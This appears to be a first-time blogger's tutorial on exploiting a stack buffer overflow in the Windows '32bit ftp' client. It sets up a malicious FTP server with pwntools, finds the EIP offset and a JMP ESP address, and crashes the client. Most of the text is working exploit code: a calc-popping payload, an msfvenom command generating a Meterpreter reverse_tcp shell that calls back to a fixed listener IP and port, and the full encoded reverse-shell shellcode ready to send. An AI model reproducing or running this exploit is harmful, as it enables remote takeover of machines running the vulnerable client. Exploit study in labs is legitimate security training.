Windows Buffer Overflow (32bit ftp)
Today I will show how to exploit the 32bit windows buffer overflow .This is my first post of writing blog post.
What is buffer mean?
Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs
A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.
There is alot of tutorials about this 32bit ftp windows buffer overflow But I want to use the modern technique while the exploit the windows buffer overflow.Let’s start.
- U can download the 32bit ftp exe file here
- U can test any windows version.
- Immunity Debugger
First u need to load the 32bit ftp in immunity debugger.
File > open > select the ftp file and open.
When i try run via debugger ,its ask me ftp server ip and port.So we need create the ftp server and let that client ftp connect to us.Let create the simple ftp server using pwntools.
from pwn import * l = listen(21) payload ="Sent some strings" _ = l.wait_for_connection() l.sendline("220 " + payload)
sudo python test.py
Important ; Once u run the debgger ,every time u need to restart the debugger by pressing ctr+f2 or Debug tab > restart.
Next step . let crash the client ftp with a bunch of “A”
from pwn import * l = listen(21) payload ="A"*1000 _ = l.wait_for_connection() l.sendline("220"+payload)
Great!. It crash . When we focus the EIP in debugger the Stack fill with alot of “A” .(EIP 41414141)
All of the registers have been overwritten by 41 (hex for A). This means that we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite the EIP. At this point, we know that the EIP is located somewhere between 1 and 1000 bytes, but we are not sure where it’s located exactly. What we need to do next is figure out exactly where the EIP is located (in bytes) and attempt to control it.
Next step is to find offset .Let’s find .
from pwn import * l = listen(21) payload =cyclic(1000) _ = l.wait_for_connection() l.sendline("220 " + payload)
Select the EIP address (786A6161) and find with cyclic_find()
Offset = 989
To execute shellcode, we need to find a JMP/CALL ESP memory address, so EIP will read it and jump to the memory address stored in ESP. When you loaded the FTP client program in Immunity, you saw the kernel32.dll module was also loaded.So we jump that address let the shellcode run.
!mona jmp -r esp -m kernel
U will see 3 jmp esp addresses and 2 call esp addresses .U can use one of them .All addresses is worked.So, let jump this addresses with shellcode.Firstly I will execute the calculator .After this i will show how to generate reverse shell and exploit this.Let’s Pop calculator.
To generate the calc using msfvenom
msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b “\x00”
Note: This ftp doesn’t contains any bad characters .So I will not show u how find bad characters in easy way and how avoid them.But I will write in another post .
Ths goal is Buffer + jmp esp + NOP + shellcode .
Why NOP contains in this exploit?
Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.
Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.
The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.
A 128-byte NOP sled is just a group of NOP intructions 128 bytes wide.
NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.
NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.
Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work
from pwn import * payload ="\x41"*989 #jmp esp address payload +=p32(0x765A3132) payload += "\x90" * 30 payload += ( "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" "\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b" "\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" "\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73" "\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61" "\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7" ) l = listen(21) _ = l.wait_for_connection() l.sendline("220 " + payload)
Ogay. cacl.exe pop up successfully .now I will generate the reverse shellcode using msfvenom.Coz i wanna control this machine ,popping calc isn’t enough for me :D….
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 –platform win -e x86/alpha_mixed -f c -b ‘\x00’
Put the result in python script and run .
from pwn import * payload ="\x41"*989 #jmp esp address payload +=p32(0x771F3132) payload += "\x90"*30 payload += ( "\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" "\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c" "\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30" "\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63" "\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f" "\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a" "\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42" "\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c" "\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71" "\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37" "\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b" "\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76" "\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43" "\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46" "\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b" "\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c" "\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74" "\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b" "\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b" "\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35" "\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c" "\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c" "\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34" "\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b" "\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68" "\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66" "\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70" "\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a" "\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75" "\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57" "\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57" "\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53" "\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f" "\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55" "\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50" "\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a" "\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46" "\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69" "\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78" "\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70" "\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45" "\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a" "\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65" "\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39" "\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51" "\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63" "\x30\x61\x43\x49\x6f\x5a\x75\x41\x41" ) l = listen(21) _ = l.wait_for_connection() l.sendline("220 " + payload)
Wait for connection in another terminal .
Let Break !
Exploit development is the long way journey .It’s endless, We just need to run. 😀 😀
If u face any trouble during testing .Just ping me.